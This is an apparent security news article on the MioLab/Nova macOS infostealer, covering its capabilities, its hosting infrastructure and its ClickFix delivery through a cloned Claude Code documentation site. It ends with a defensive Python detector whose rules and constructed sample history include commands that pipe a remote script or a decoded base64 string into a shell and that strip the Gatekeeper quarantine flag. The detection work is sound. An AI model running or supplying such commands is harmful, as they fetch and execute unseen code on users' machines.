Emerging Threat: MioLab Infostealer Targets macOS Users with Advanced Tactics
A new and sophisticated macOS infostealer, known as MioLab or Nova, has surfaced, marking a significant evolution in malware targeting Apple users. Advertised on Russian-speaking underground forums, MioLab exemplifies the growing interest of cybercriminals in macOS platforms, which have traditionally been considered less susceptible to such threats.
MioLab’s Capabilities and Architecture
MioLab operates as a Malware-as-a-Service (MaaS) platform, offering a user-friendly web interface and a compact C-based payload approximately 100 KB in size. This lightweight design aids in evading signature-based antivirus detection. The malware is compatible with both Intel x86-64 and Apple Silicon ARM64 architectures, ensuring functionality across macOS versions from Sierra to Tahoe.
The infostealer boasts a range of capabilities, including:
– Credential Theft: Extracting login information from various browsers.
– Cryptocurrency Wallet Draining: Accessing and transferring funds from digital wallets.
– Password Manager Harvesting: Collecting stored passwords from password management applications.
– File Collection: Gathering specific files from the infected system.
A premium module extends its functionality to hardware wallets like Ledger and Trezor, enabling the theft of 24-word BIP39 recovery seed phrases, which are crucial for accessing cryptocurrency funds.
Rapid Development and Enhanced Features
Analysts from LevelBlue have observed an unusually swift development cycle for MioLab. Recent updates up to February 2026 have introduced significant enhancements, such as:
– Rebuilt Hardware Wallet Extraction Module: Improving the efficiency of extracting data from hardware wallets.
– On-Device Apple Notes Decryption: Allowing access to sensitive information stored in Apple Notes.
– Functional Safari Cookie Grabber: Enabling the collection of session cookies from Safari, potentially leading to unauthorized account access.
– Comprehensive Team API: Facilitating the programmatic generation of payloads and retrieval of stolen data without direct interaction with the web panel.
Additionally, MioLab integrates Telegram bot notifications, providing real-time alerts to cybercriminal affiliates, known as traffers, about new infections.
Infrastructure and Broader Cybercrime Ecosystem
Investigations into MioLab’s infrastructure reveal its operators are part of a larger cybercriminal network. The malware’s administrative panel was previously hosted on playavalon[.]org, which has since been repurposed for an Ethereum token airdrop phishing campaign. This indicates a strategy to convert residual traffic from previous operations into new fraudulent activities.
Both the MioLab operation and the phishing campaign are linked to FEMO IT Solutions Ltd., a bulletproof hosting provider under the Defhost brand, known for shielding various malware families from law enforcement scrutiny.
ClickFix Delivery: Exploiting User Trust
A notable feature of MioLab is its ClickFix infection chain, a social engineering technique that deceives users into executing malicious commands in the macOS Terminal. The malware’s web panel includes a utility that generates a Terminal payload, which can be deployed through fake CAPTCHA pages or cloned developer portals.
Recently, researcher Marcelo Rivero identified a malvertising campaign distributing MioLab via a convincing clone of the documentation site for Claude Code, Anthropic's legitimate command-line AI tool. This campaign specifically targeted developers comfortable with executing Terminal commands, increasing the likelihood of successful infections.
Implications and Recommendations
The emergence of MioLab underscores a significant shift in the threat landscape for macOS users. As Apple’s market share grows among professionals and cryptocurrency enthusiasts, macOS has become an attractive target for cybercriminals.
To mitigate the risk of infection:
– Exercise Caution with Terminal Commands: Avoid executing commands from unverified sources.
– Verify Software Sources: Download applications only from official websites or trusted platforms.
– Stay Informed: Keep abreast of emerging threats targeting macOS systems.
– Implement Robust Security Measures: Utilize comprehensive security solutions capable of detecting and preventing advanced malware threats.
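The ClickFix chain described above works only because a user pastes a generated one-liner into Terminal, so a defender's first question is what such a command looks like in shell history or process telemetry. The following is an added example written for this article, not code from LevelBlue or the MioLab research, and it does not encode any MioLab-specific signature: it scores commands against generic patterns (a remote fetch piped into a shell, an inline base64 blob decoded and executed, removal of the quarantine attribute, inline osascript, making a temp file executable) that are assumptions about how social-engineered Terminal payloads tend to be shaped. The sample history lines are constructed, and `example.invalid` is a reserved placeholder domain, not an indicator from the campaign.

```python
"""Heuristic triage of shell commands for ClickFix-style Terminal one-liners.

Added example for this article; rule patterns and weights are illustrative
assumptions, not MioLab signatures. Sample input is constructed.
"""
import base64
import binascii
import re
from typing import Dict, List, Optional

# Each rule: (name, regex, weight). Weights are assumed values for illustration.
RULES = [
    # curl/wget output piped straight into sh/bash/zsh (optionally via sudo)
    ("remote_fetch_piped_to_shell",
     re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(sudo\s+)?(ba|z)?sh\b"), 5),
    # an inline base64 blob decoded and handed to a shell
    ("encoded_payload_decoded_and_run",
     re.compile(r"base64\s+(-d|--decode|-D)\b.*\|\s*(ba|z)?sh\b"), 4),
    # Gatekeeper quarantine attribute stripped from a downloaded file
    ("quarantine_attribute_removed",
     re.compile(r"xattr\s+(-d|-r\s+-d|-dr|-rd)\s+com\.apple\.quarantine"), 3),
    # AppleScript passed inline rather than run from a file
    ("osascript_inline", re.compile(r"\bosascript\s+-e\b"), 2),
    # execute bit set on something living in a temp directory
    ("exec_bit_set_on_temp_file",
     re.compile(r"chmod\s+[+0-7]*x\S*\s+(/tmp/|/private/tmp/|/var/folders/)"), 2),
]

# echo "<base64>" | base64 -d   -> capture the literal so an analyst can read it
B64_LITERAL = re.compile(
    r"""echo\s+(?:-n\s+)?['"]?([A-Za-z0-9+/=]{8,})['"]?\s*\|\s*base64\s+(?:-d|--decode|-D)"""
)

# Constructed zsh-history-style lines; not real telemetry.
SAMPLE_HISTORY = [
    "git status",
    "brew install jq",
    'echo "aGVsbG8K" | base64 -d | sh',
    "curl -fsSL https://example.invalid/fix.sh | bash",
    "curl -fsSL https://example.invalid/installer.sh -o installer.sh",
    "xattr -d com.apple.quarantine ~/Downloads/tool && ~/Downloads/tool",
    "osascript -e 'display dialog \"hi\"'",
]


def decode_inline_base64(cmd: str) -> Optional[str]:
    """Return the decoded text of an inline base64 literal, or None."""
    m = B64_LITERAL.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def score_command(cmd: str) -> Dict:
    """Score one command: sum of weights for every rule that matches."""
    hits = [name for name, rx, _ in RULES if rx.search(cmd)]
    score = sum(w for name, rx, w in RULES if rx.search(cmd))
    return {"command": cmd, "score": score, "hits": hits,
            "decoded": decode_inline_base64(cmd)}


def triage(lines: List[str], threshold: int = 3) -> List[Dict]:
    """Return the commands whose score reaches the (assumed) review threshold."""
    return [r for r in (score_command(line) for line in lines)
            if r["score"] >= threshold]


if __name__ == "__main__":
    for r in triage(SAMPLE_HISTORY):
        print(f"[{r['score']}] {r['command']}  hits={r['hits']}")
        if r["decoded"] is not None:
            print(f"      decoded payload: {r['decoded']!r}")
```

Note that the plain `curl ... -o installer.sh` line is deliberately not flagged: downloading a file is ordinary developer activity, and the signal here is execution of content the user never saw, not the fetch itself. In practice the same rules would run over EDR command-line telemetry rather than shell history, since a ClickFix command is usually pasted once and history may be disabled.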
By adopting these practices, users can enhance their defenses against sophisticated malware like MioLab and safeguard their sensitive information.